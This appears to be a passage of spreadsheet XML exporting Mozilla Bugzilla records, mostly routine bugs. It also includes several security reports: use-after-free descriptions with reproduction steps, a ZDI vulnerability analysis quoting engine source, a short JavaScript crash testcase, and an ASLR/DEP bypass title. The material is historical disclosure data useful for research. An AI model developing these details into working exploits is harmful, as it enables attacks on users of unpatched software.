      <c r="K3741" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3741" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3741" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3741" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3741" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3741" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main45+]</t>
        </is>
      </c>
      <c r="Q3741" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3741" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3741" t="inlineStr">
        <is>
          <t>mozilla45</t>
        </is>
      </c>
      <c r="T3741" t="n">
        <v>1</v>
      </c>
      <c r="U3741" t="n">
        <v>0</v>
      </c>
      <c r="V3741" t="n">
        <v>17</v>
      </c>
      <c r="W3741" t="inlineStr">
        <is>
          <t>Soon a crashtest to reproduce this issue.</t>
        </is>
      </c>
      <c r="X3741" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3742">
      <c r="A3742" t="n">
        <v>1846688</v>
      </c>
      <c r="B3742" t="inlineStr">
        <is>
          <t>2023-08-02 00:13:12 -0700</t>
        </is>
      </c>
      <c r="C3742" t="inlineStr">
        <is>
          <t>use-after-free in ColorPickerShownCallback</t>
        </is>
      </c>
      <c r="D3742" t="inlineStr">
        <is>
          <t>2024-05-30 11:13:19 -0700</t>
        </is>
      </c>
      <c r="E3742" t="n">
        <v>1</v>
      </c>
      <c r="F3742" t="n">
        <v>1</v>
      </c>
      <c r="G3742" t="n">
        <v>3</v>
      </c>
      <c r="H3742" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3742" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3742" t="inlineStr">
        <is>
          <t>DOM: Content Processes</t>
        </is>
      </c>
      <c r="K3742" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3742" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3742" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3742" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3742" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3742" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?] [adv-main117+] [adv-esr115.2+] [adv-esr102.15+]</t>
        </is>
      </c>
      <c r="Q3742" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3742" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S3742" t="inlineStr">
        <is>
          <t>118 Branch</t>
        </is>
      </c>
      <c r="T3742" t="n">
        <v>1</v>
      </c>
      <c r="U3742" t="n">
        <v>0</v>
      </c>
      <c r="V3742" t="n">
        <v>21</v>
      </c>
      <c r="W3742" t="inlineStr">
        <is>
          <t>Created attachment 9346872
ASAN.txt
|ColorPickerShownCallback| is requested when a Color Picker window open[1]. It isn’t considered several |ColorPickerShownCallbacks| are requested at a time. And |Done()| will destroy |mColorPickerParent|[2]. This leads to use-after-free when another |Done()| is called after a |Done()|
[1]: https://searchfox.org/mozilla-central/source/dom/ipc/ColorPickerParent.cpp#66
[2]: https://searchfox.org/mozilla-central/source/dom/ipc/ColorPickerParent.cpp#30
REPRODUCE
1. apply *patch.diff
2. visit index.html
*: Patch to emulate a compromised content process.
Crash State: see asan file</t>
        </is>
      </c>
      <c r="X3742" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3743">
      <c r="A3743" t="n">
        <v>1441284</v>
      </c>
      <c r="B3743" t="inlineStr">
        <is>
          <t>2018-02-26 12:10:00 -0800</t>
        </is>
      </c>
      <c r="C3743" t="inlineStr">
        <is>
          <t>Remove various properties of the PanelMultiview object and start simplifying the cleanup process</t>
        </is>
      </c>
      <c r="D3743" t="inlineStr">
        <is>
          <t>2019-03-31 02:22:02 -0700</t>
        </is>
      </c>
      <c r="E3743" t="n">
        <v>1</v>
      </c>
      <c r="F3743" t="n">
        <v>1</v>
      </c>
      <c r="G3743" t="n">
        <v>2</v>
      </c>
      <c r="H3743" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3743" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J3743" t="inlineStr">
        <is>
          <t>Toolbars and Customization</t>
        </is>
      </c>
      <c r="K3743" t="inlineStr">
        <is>
          <t>59 Branch</t>
        </is>
      </c>
      <c r="L3743" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3743" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3743" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3743" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3743" t="inlineStr"/>
      <c r="Q3743" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3743" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3743" t="inlineStr">
        <is>
          <t>Firefox 60</t>
        </is>
      </c>
      <c r="T3743" t="n">
        <v>1</v>
      </c>
      <c r="U3743" t="n">
        <v>0</v>
      </c>
      <c r="V3743" t="n">
        <v>45</v>
      </c>
      <c r="W3743" t="inlineStr">
        <is>
          <t>There are now some easy wins and simplifications that can be done in the PanelMultiView object. This separate bug gets them out of the way, so they don't need to be handled as drive-by cleanup during or after bug 1428839.</t>
        </is>
      </c>
      <c r="X3743" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3744">
      <c r="A3744" t="n">
        <v>735104</v>
      </c>
      <c r="B3744" t="inlineStr">
        <is>
          <t>2012-03-12 16:39:30 -0700</t>
        </is>
      </c>
      <c r="C3744" t="inlineStr">
        <is>
          <t>Array toString Remote Code Execution (ZDI-CAN-1549)</t>
        </is>
      </c>
      <c r="D3744" t="inlineStr">
        <is>
          <t>2012-04-10 21:32:37 -0700</t>
        </is>
      </c>
      <c r="E3744" t="n">
        <v>1</v>
      </c>
      <c r="F3744" t="n">
        <v>1</v>
      </c>
      <c r="G3744" t="n">
        <v>3</v>
      </c>
      <c r="H3744" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3744" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3744" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K3744" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3744" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3744" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3744" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3744" t="inlineStr">
        <is>
          <t>DUPLICATE</t>
        </is>
      </c>
      <c r="P3744" t="inlineStr">
        <is>
          <t>[sg:dupe 720079]</t>
        </is>
      </c>
      <c r="Q3744" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3744" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3744" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3744" t="n">
        <v>1</v>
      </c>
      <c r="U3744" t="n">
        <v>0</v>
      </c>
      <c r="V3744" t="n">
        <v>11</v>
      </c>
      <c r="W3744" t="inlineStr">
        <is>
          <t>ZDI-CAN-1549: Mozilla Firefox Array toString Remote Code Execution
Vulnerability
- -- CVSS -----------------------------------------
9, AV:N/AC:L/Au:N/C:P/I:P/A:C
- -- ABSTRACT -------------------------------------
TippingPoint has identified a vulnerability affecting the following
products:
  Mozilla Firefox
- -- VULNERABILITY DETAILS ------------------------
/*
js/src/jsarray.cpp
array_join calls array_toString_sub
which has:
...
        const Value *beg = obj-&gt;getDenseArrayElements();
        const Value *end = beg + Min(length,
obj-&gt;getDenseArrayInitializedLength());
        for (const Value *vp = beg; vp != end; ++vp) {
            if (!JS_CHECK_OPERATION_LIMIT(cx))
                return false;
            if (!vp-&gt;isMagic(JS_ARRAY_HOLE) &amp;&amp; !vp-&gt;isNullOrUndefined()) {
                if (!ValueToStringBuffer(cx, *vp, sb))
                    return false;
            }
...
ValueToStringBuffer calls back to javascript using a toString function,
we can change the array from under it, without beg and end being
updated, and the gc
will free them since they are not marked as in use.
run in Jshell! (else, you need gc code and print code)
*/
- -- CREDIT ---------------------------------------
This vulnerability was discovered by:
   Vincenzo Iozzo</t>
        </is>
      </c>
      <c r="X3744" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3745">
      <c r="A3745" t="n">
        <v>1399490</v>
      </c>
      <c r="B3745" t="inlineStr">
        <is>
          <t>2017-09-13 07:14:28 -0700</t>
        </is>
      </c>
      <c r="C3745" t="inlineStr">
        <is>
          <t>Downloads button is inaccessible after removing it from the toolbar and restarting Firefox</t>
        </is>
      </c>
      <c r="D3745" t="inlineStr">
        <is>
          <t>2017-10-10 08:08:04 -0700</t>
        </is>
      </c>
      <c r="E3745" t="n">
        <v>1</v>
      </c>
      <c r="F3745" t="n">
        <v>1</v>
      </c>
      <c r="G3745" t="n">
        <v>2</v>
      </c>
      <c r="H3745" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3745" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J3745" t="inlineStr">
        <is>
          <t>Toolbars and Customization</t>
        </is>
      </c>
      <c r="K3745" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3745" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3745" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3745" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3745" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3745" t="inlineStr">
        <is>
          <t>[reserve-photon-structure]</t>
        </is>
      </c>
      <c r="Q3745" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3745" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3745" t="inlineStr">
        <is>
          <t>Firefox 57</t>
        </is>
      </c>
      <c r="T3745" t="n">
        <v>1</v>
      </c>
      <c r="U3745" t="n">
        <v>0</v>
      </c>
      <c r="V3745" t="n">
        <v>8</v>
      </c>
      <c r="W3745" t="inlineStr">
        <is>
          <t>On a new profile:
1. Start a download (the button appears in the toolbar). I could reproduce the bug with the next few steps whether I waited for the download to complete or not.
2. Right click the Downloads button and remove it from the toolbar. It is now accessible from customize mode.
3. Restart Firefox. It is now gone from customize mode, and does not automatically appear either (though the latter is expected).</t>
        </is>
      </c>
      <c r="X3745" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3746">
      <c r="A3746" t="n">
        <v>706249</v>
      </c>
      <c r="B3746" t="inlineStr">
        <is>
          <t>2011-11-29 13:36:44 -0800</t>
        </is>
      </c>
      <c r="C3746" t="inlineStr">
        <is>
          <t>"ASSERTION: We've overflowed the mSpec buffer" in nsStandardURL::BuildNormalizedSpec</t>
        </is>
      </c>
      <c r="D3746" t="inlineStr">
        <is>
          <t>2012-02-23 17:27:59 -0800</t>
        </is>
      </c>
      <c r="E3746" t="n">
        <v>1</v>
      </c>
      <c r="F3746" t="n">
        <v>1</v>
      </c>
      <c r="G3746" t="n">
        <v>3</v>
      </c>
      <c r="H3746" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3746" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3746" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K3746" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3746" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3746" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3746" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3746" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3746" t="inlineStr">
        <is>
          <t>[sg:critical][qa!]</t>
        </is>
      </c>
      <c r="Q3746" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3746" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3746" t="inlineStr">
        <is>
          <t>mozilla11</t>
        </is>
      </c>
      <c r="T3746" t="n">
        <v>1</v>
      </c>
      <c r="U3746" t="n">
        <v>0</v>
      </c>
      <c r="V3746" t="n">
        <v>12</v>
      </c>
      <c r="W3746" t="inlineStr">
        <is>
          <t>Created attachment 577738
testcase
###!!! ASSERTION: We've overflowed the mSpec buffer!: 'mSpec.Length() &lt;= approxLen', file netwerk/base/src/nsStandardURL.cpp, line 697
The last major change to this function was in bug 125608.</t>
        </is>
      </c>
      <c r="X3746" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3747">
      <c r="A3747" t="n">
        <v>643839</v>
      </c>
      <c r="B3747" t="inlineStr">
        <is>
          <t>2011-03-22 11:47:45 -0700</t>
        </is>
      </c>
      <c r="C3747" t="inlineStr">
        <is>
          <t>Crash [@ js::gc::MarkChildren]</t>
        </is>
      </c>
      <c r="D3747" t="inlineStr">
        <is>
          <t>2013-03-13 06:17:58 -0700</t>
        </is>
      </c>
      <c r="E3747" t="n">
        <v>1</v>
      </c>
      <c r="F3747" t="n">
        <v>1</v>
      </c>
      <c r="G3747" t="n">
        <v>3</v>
      </c>
      <c r="H3747" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3747" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3747" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K3747" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3747" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3747" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N3747" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3747" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3747" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q3747" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3747" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3747" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3747" t="n">
        <v>1</v>
      </c>
      <c r="U3747" t="n">
        <v>0</v>
      </c>
      <c r="V3747" t="n">
        <v>25</v>
      </c>
      <c r="W3747" t="inlineStr">
        <is>
          <t>try {
    x
} catch(r) {}
try {
    x = &lt;x/&gt;
    x.c = x;
    with(x) {
        x
    }
    x.__defineSetter__("x", function() {})
    gc()
    instanceof({
        a: x
    })
} catch(r) {}
gc()
crashes js opt shell on TM changeset c811be25eaad without -m nor -j at js::gc::MarkChildren but does not seem to crash debug shell.
Locking s-s just to be safe.
autoBisect shows this is probably related to the following changeset:
The first bad revision is:
changeset:   63258:b16be37906fe
user:        Andreas Gal
date:        Wed Mar 09 00:53:56 2011 -0800
summary:     Don't shrink object slots during GC (bug 639727, r=bhackett).</t>
        </is>
      </c>
      <c r="X3747" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3748">
      <c r="A3748" t="n">
        <v>1450874</v>
      </c>
      <c r="B3748" t="inlineStr">
        <is>
          <t>2018-04-03 00:43:43 -0700</t>
        </is>
      </c>
      <c r="C3748" t="inlineStr">
        <is>
          <t>Crash in nsTArray_Impl&lt;T&gt;::AppendElement&lt;T&gt; | mozilla::dom::WorkerLoadInfo::InterfaceRequestor::MaybeAddTabChild</t>
        </is>
      </c>
      <c r="D3748" t="inlineStr">
        <is>
          <t>2018-04-12 21:06:22 -0700</t>
        </is>
      </c>
      <c r="E3748" t="n">
        <v>1</v>
      </c>
      <c r="F3748" t="n">
        <v>1</v>
      </c>
      <c r="G3748" t="n">
        <v>3</v>
      </c>
      <c r="H3748" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3748" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3748" t="inlineStr">
        <is>
          <t>DOM: Service Workers</t>
        </is>
      </c>
      <c r="K3748" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3748" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3748" t="inlineStr">
        <is>
          <t>Windows</t>
        </is>
      </c>
      <c r="N3748" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3748" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3748" t="inlineStr"/>
      <c r="Q3748" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3748" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3748" t="inlineStr">
        <is>
          <t>mozilla61</t>
        </is>
      </c>
      <c r="T3748" t="n">
        <v>1</v>
      </c>
      <c r="U3748" t="n">
        <v>0</v>
      </c>
      <c r="V3748" t="n">
        <v>26</v>
      </c>
      <c r="W3748" t="inlineStr">
        <is>
          <t>This bug was filed from the Socorro interface and is
report bp-4a398844-871f-4b8c-ab8e-c4c870180403.
=============================================================
Top 10 frames of crashing thread:
0 xul.dll nsTArray_Impl&lt;RefPtr&lt;mozilla::ComputedStyle&gt;, nsTArrayInfallibleAllocator&gt;::AppendElement&lt;already_AddRefed&lt;mozilla::ComputedStyle&gt;, nsTArrayInfallibleAllocator&gt; xpcom/ds/nsTArray.h:2286
1 xul.dll mozilla::dom::WorkerLoadInfo::InterfaceRequestor::MaybeAddTabChild dom/workers/WorkerLoadInfo.cpp:472
2 xul.dll mozilla::dom::ServiceWorkerPrivate::SpawnWorkerIfNeeded dom/serviceworkers/ServiceWorkerPrivate.cpp:1822
3 xul.dll mozilla::dom::ServiceWorkerPrivate::SendFetchEvent dom/serviceworkers/ServiceWorkerPrivate.cpp:1757
4 xul.dll static nsresult mozilla::dom::`anonymous namespace'::ContinueDispatchFetchEventRunnable::Run dom/serviceworkers/ServiceWorkerManager.cpp:2328
5 xul.dll nsPermissionManager::WhenPermissionsAvailable extensions/cookie/nsPermissionManager.cpp:3444
6 xul.dll static void &lt;lambda_499c2de420bd99c0430356c54ec813d7&gt;::operator dom/serviceworkers/ServiceWorkerManager.cpp:2496
7 xul.dll nsresult mozilla::detail::RunnableFunction&lt;&lt;lambda_499c2de420bd99c0430356c54ec813d7&gt; &gt;::Run xpcom/threads/nsThreadUtils.h:551
8 xul.dll mozilla::net::HttpBaseChannel::EnsureUploadStreamIsCloneable netwerk/protocol/http/HttpBaseChannel.cpp:918
9 xul.dll mozilla::dom::ServiceWorkerManager::DispatchFetchEvent dom/serviceworkers/ServiceWorkerManager.cpp:2509
=============================================================
There are 223 crashes (from 17 installations) in nightly 61 with buildid 20180402220122. In analyzing the backtrace, the regression may have been introduced by patch [1] to fix bug 1448141.
[1] https://hg.mozilla.org/mozilla-central/rev?node=c22501d278b4</t>
        </is>
      </c>
      <c r="X3748" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3749">
      <c r="A3749" t="n">
        <v>105799</v>
      </c>
      <c r="B3749" t="inlineStr">
        <is>
          <t>2001-10-20 05:14:35 -0700</t>
        </is>
      </c>
      <c r="C3749" t="inlineStr">
        <is>
          <t>Printing a table with a cell larger than one page</t>
        </is>
      </c>
      <c r="D3749" t="inlineStr">
        <is>
          <t>2002-01-31 14:52:01 -0800</t>
        </is>
      </c>
      <c r="E3749" t="n">
        <v>1</v>
      </c>
      <c r="F3749" t="n">
        <v>1</v>
      </c>
      <c r="G3749" t="n">
        <v>3</v>
      </c>
      <c r="H3749" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3749" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3749" t="inlineStr">
        <is>
          <t>Printing: Output</t>
        </is>
      </c>
      <c r="K3749" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3749" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3749" t="inlineStr">
        <is>
          <t>Windows 98</t>
        </is>
      </c>
      <c r="N3749" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3749" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3749" t="inlineStr">
        <is>
          <t>printing</t>
        </is>
      </c>
      <c r="Q3749" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3749" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3749" t="inlineStr">
        <is>
          <t>mozilla0.9.7</t>
        </is>
      </c>
      <c r="T3749" t="n">
        <v>1</v>
      </c>
      <c r="U3749" t="n">
        <v>0</v>
      </c>
      <c r="V3749" t="n">
        <v>9</v>
      </c>
      <c r="W3749" t="inlineStr">
        <is>
          <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (Windows; U; Win98; en-US; rv:0.9.1) Gecko/20010607
BuildID:    2001060703
The attached page contains a cell which exceeds the page when printing. All
content after the page end is discarded instead of moved to the next page.
Reproducible: Always
Steps to Reproduce:
1. Load the page
2. Choose Print
3. Watch the output
Actual Results:  (With A4 paper) The first 3 cells are printed on the first
page. The 4th cell is printed on the second page (as far as it fits; the all
other content is discarded). The remaining cells are printed on the last page.
Expected Results:  The first 3 cells are printed on the first page. The 4th cell
is printed partially on the first and partially on the second page. The
remaining cells are printed on the second and third pages.</t>
        </is>
      </c>
      <c r="X3749" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3750">
      <c r="A3750" t="n">
        <v>1134916</v>
      </c>
      <c r="B3750" t="inlineStr">
        <is>
          <t>2015-02-19 16:27:21 -0800</t>
        </is>
      </c>
      <c r="C3750" t="inlineStr">
        <is>
          <t>Jobs API returns data in wrong order (should be sorted by push timestamp)</t>
        </is>
      </c>
      <c r="D3750" t="inlineStr">
        <is>
          <t>2015-03-09 06:47:04 -0700</t>
        </is>
      </c>
      <c r="E3750" t="n">
        <v>1</v>
      </c>
      <c r="F3750" t="n">
        <v>1</v>
      </c>
      <c r="G3750" t="n">
        <v>7</v>
      </c>
      <c r="H3750" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I3750" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J3750" t="inlineStr">
        <is>
          <t>Treeherder: API</t>
        </is>
      </c>
      <c r="K3750" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L3750" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3750" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3750" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3750" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3750" t="inlineStr"/>
      <c r="Q3750" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3750" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S3750" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3750" t="n">
        <v>1</v>
      </c>
      <c r="U3750" t="n">
        <v>0</v>
      </c>
      <c r="V3750" t="n">
        <v>10</v>
      </c>
      <c r="W3750" t="inlineStr">
        <is>
          <t>The job API of .allizom.org returns data in the format from old to new, whereas at .mozilla.org, it is returned from new to old.
The most likely cause is bug 1097090 which removed several pieces of sorting code and ORDER BY statements from SQL statements during the re-factoring.</t>
        </is>
      </c>
      <c r="X3750" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3751">
      <c r="A3751" t="n">
        <v>946574</v>
      </c>
      <c r="B3751" t="inlineStr">
        <is>
          <t>2013-12-04 20:59:21 -0800</t>
        </is>
      </c>
      <c r="C3751" t="inlineStr">
        <is>
          <t>Tracking bug for build and release of SeaMonkey 2.23 Beta 2</t>
        </is>
      </c>
      <c r="D3751" t="inlineStr">
        <is>
          <t>2014-01-17 16:25:31 -0800</t>
        </is>
      </c>
      <c r="E3751" t="n">
        <v>1</v>
      </c>
      <c r="F3751" t="n">
        <v>1</v>
      </c>
      <c r="G3751" t="n">
        <v>2</v>
      </c>
      <c r="H3751" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3751" t="inlineStr">
        <is>
          <t>SeaMonkey</t>
        </is>
      </c>
      <c r="J3751" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="K3751" t="inlineStr">
        <is>
          <t>SeaMonkey 2.23 Branch</t>
        </is>
      </c>
      <c r="L3751" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3751" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3751" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3751" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3751" t="inlineStr"/>
      <c r="Q3751" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3751" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S3751" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3751" t="n">
        <v>1</v>
      </c>
      <c r="U3751" t="n">
        <v>0</v>
      </c>
      <c r="V3751" t="n">
        <v>4</v>
      </c>
      <c r="W3751" t="inlineStr">
        <is>
          <t>This is a tracking bug for Build and Release of SeaMonkey 2.23 Beta 2
We expect an actual release on TBD.</t>
        </is>
      </c>
      <c r="X3751" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3752">
      <c r="A3752" t="n">
        <v>759802</v>
      </c>
      <c r="B3752" t="inlineStr">
        <is>
          <t>2012-05-30 09:52:57 -0700</t>
        </is>
      </c>
      <c r="C3752" t="inlineStr">
        <is>
          <t>Null-pointer execution/null out of bounds write at  libjpeg/jdmarker.c</t>
        </is>
      </c>
      <c r="D3752" t="inlineStr">
        <is>
          <t>2024-05-29 16:01:26 -0700</t>
        </is>
      </c>
      <c r="E3752" t="n">
        <v>1</v>
      </c>
      <c r="F3752" t="n">
        <v>1</v>
      </c>
      <c r="G3752" t="n">
        <v>3</v>
      </c>
      <c r="H3752" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3752" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3752" t="inlineStr">
        <is>
          <t>Graphics</t>
        </is>
      </c>
      <c r="K3752" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3752" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M3752" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3752" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3752" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3752" t="inlineStr">
        <is>
          <t>[qa+][advisory-tracking+][asan]</t>
        </is>
      </c>
      <c r="Q3752" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3752" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3752" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3752" t="n">
        <v>1</v>
      </c>
      <c r="U3752" t="n">
        <v>0</v>
      </c>
      <c r="V3752" t="n">
        <v>60</v>
      </c>
      <c r="W3752" t="inlineStr">
        <is>
          <t>Created attachment 628366
Repro-file
Repro-file as attachment.
Crash-report:
https://crash-stats.mozilla.com/report/index/bp-7fbc775d-2fc4-46ff-9af8-b8a0f2120530
This issue seems to affect also Google Chrome and I have already reported it to Google. They have given me permission to report it also for Mozilla.</t>
        </is>
      </c>
      <c r="X3752" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3753">
      <c r="A3753" t="n">
        <v>1325200</v>
      </c>
      <c r="B3753" t="inlineStr">
        <is>
          <t>2016-12-21 13:25:55 -0800</t>
        </is>
      </c>
      <c r="C3753" t="inlineStr">
        <is>
          <t>lack of executable-code quota allows full bypass of ASLR and DEP</t>
        </is>
      </c>
      <c r="D3753" t="inlineStr">
        <is>
          <t>2024-05-30 09:24:20 -0700</t>
        </is>
      </c>
      <c r="E3753" t="n">
        <v>1</v>
      </c>
      <c r="F3753" t="n">
        <v>1</v>
      </c>
      <c r="G3753" t="n">
        <v>3</v>
      </c>
      <c r="H3753" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3753" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3753" t="inlineStr">
        <is>
          <t>JavaScript Engine: JIT</t>
        </is>
      </c>
      <c r="K3753" t="inlineStr">
        <is>
